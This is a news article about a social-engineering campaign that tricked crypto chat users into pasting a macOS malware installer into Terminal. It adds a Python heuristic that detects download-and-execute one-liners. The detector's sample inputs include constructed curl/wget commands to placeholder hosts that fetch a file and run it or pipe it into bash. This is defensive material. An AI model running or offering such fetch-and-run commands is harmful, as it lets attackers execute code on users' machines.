
Someone impersonating administrators of cryptocurrency-related discussion channels on Slack, Discord, and other social messaging platforms has been attempting to lure others into installing macOS malware. The social-engineering campaign consists of posting a script in discussions and encouraging people to copy and paste that script into a Terminal window on their Macs. The command downloads a huge (34 megabyte) file and executes it, establishing a remote connection that acts as a backdoor for the attacker.
Patrick Wardle, a Mac malware expert, also examined the malware and dubbed it "OSX.Dummy" because, as he wrote:

  • the infection method is dumb
  • the massive size of the binary is dumb
  • the persistence mechanism is lame (and thus also dumb)
  • the capabilities are rather limited (and thus rather dumb)
  • it's trivial to detect at every step (that dumb)
  • ... and finally, the malware saves the user's password to dumpdummy
The attack, first noted by Remco Verhoef of SANS today, downloads its awkward payload from a remote server, makes that file executable, and runs it. It looks something like this:

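The campaign's one-liner itself is not reproduced on this page. What the article does describe is the shape of it: fetch a file from a remote server, mark it executable, run it (or, in the common variant, pipe the download straight into a shell). The script below is an added example, not the attackers' command and not code from the article or from any of the researchers named in it: it parses a pasted command line into its `&&`/`;`/`|` stages and flags that download-then-execute chain. The sample lines at the bottom are constructed, and the `example.invalid` hostnames are placeholders.

```python
"""Heuristic detector for the "paste this into Terminal" infection pattern.

Added example for this article: it is not the campaign's own command line
and not any vendor's detection logic.  It flags a shell one-liner that
fetches remote content with curl/wget and then either pipes it into an
interpreter or marks the saved file executable and runs it.  Sample inputs
at the bottom are constructed; the hostnames are placeholders.
"""
import re
import shlex
from urllib.parse import urlparse

FETCH_TOOLS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "osascript"}
EXEC_MODES = {"755", "775", "777", "700", "711"}
# Stage separators: &&, || and ;   (a single '|' inside a stage is a pipeline).
STAGE_SPLIT = re.compile(r"\s*(?:&&|\|\||;)\s*")


def _norm(path):
    """Compare 'script' and './script' as the same file (name-based only)."""
    return path[2:] if path.startswith("./") else path


def _tokens(segment):
    try:
        return shlex.split(segment)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        return segment.split()


def _output_path(cmd, toks):
    """Where a curl/wget invocation writes the response, if it writes a file."""
    save_flags = ("-o", "--output") if cmd == "curl" else ("-O", "--output-document")
    for i, tok in enumerate(toks):
        if tok in save_flags and i + 1 < len(toks):
            return toks[i + 1]
        if tok in (">", ">>") and i + 1 < len(toks):       # shell redirect
            return toks[i + 1]
        if tok.startswith(">") and tok.strip(">"):          # '>script' form
            return tok.lstrip(">")
    if cmd == "curl" and "-O" in toks:                       # curl -O: remote file name
        for tok in toks:
            if tok.startswith(("http://", "https://")):
                return urlparse(tok).path.rsplit("/", 1)[-1]
    return None


def analyse(cmdline):
    """Return (category, detail) indicators found in one pasted command line."""
    found = []
    downloaded = set()  # files written by curl/wget earlier in the same line
    for stage in STAGE_SPLIT.split(cmdline):
        segments = [_tokens(s) for s in stage.split("|")]
        for idx, toks in enumerate(segments):
            if not toks:
                continue
            cmd = toks[0]
            if cmd in FETCH_TOOLS:
                out = _output_path(cmd, toks)
                if out:
                    downloaded.add(_norm(out))
                    found.append(("download", f"{cmd} saves remote content to {out}"))
                nxt = segments[idx + 1] if idx + 1 < len(segments) else []
                if nxt and nxt[0] in INTERPRETERS:
                    found.append(("pipe_exec", f"{cmd} output piped straight into {nxt[0]}"))
            elif cmd == "chmod" and len(toks) >= 3:
                mode = toks[1]
                if "x" in mode or mode in EXEC_MODES:
                    for target in toks[2:]:
                        if _norm(target) in downloaded:
                            found.append(("chmod", f"chmod {mode} on downloaded file {target}"))
            elif _norm(cmd) in downloaded:
                found.append(("exec", f"downloaded file {cmd} executed directly"))
            elif cmd in INTERPRETERS and len(toks) > 1 and _norm(toks[1]) in downloaded:
                found.append(("exec", f"downloaded file {toks[1]} run via {cmd}"))
    return found


def is_download_and_execute(cmdline):
    """True when remote content ends up executed within the same command line."""
    return any(cat in ("pipe_exec", "exec") for cat, _ in analyse(cmdline))


# Constructed sample lines (placeholder hosts), not captured from the campaign.
SAMPLES = [
    "cd /tmp && curl -s http://example.invalid/payload > script && chmod +x script && ./script",
    "curl -fsSL http://example.invalid/install.sh | bash",
    "wget -O /tmp/helper http://example.invalid/helper; chmod 755 /tmp/helper; bash /tmp/helper",
    "curl -s https://example.invalid/api -o report.json && cat report.json",
    "brew install wget",
]

if __name__ == "__main__":
    for line in SAMPLES:
        verdict = "SUSPICIOUS" if is_download_and_execute(line) else "ok"
        print(f"{verdict:10} {line}")
        for cat, detail in analyse(line):
            print(f"           [{cat}] {detail}")
```

The matching is deliberately by file name rather than by resolved path, and it will not see through `eval`, base64 wrappers, or a `|` hidden inside quotes; it is meant as the cheap first check a channel moderator or a shell-history review could apply to "just paste this" instructions, not as a replacement for endpoint monitoring of what the dropped binary then does.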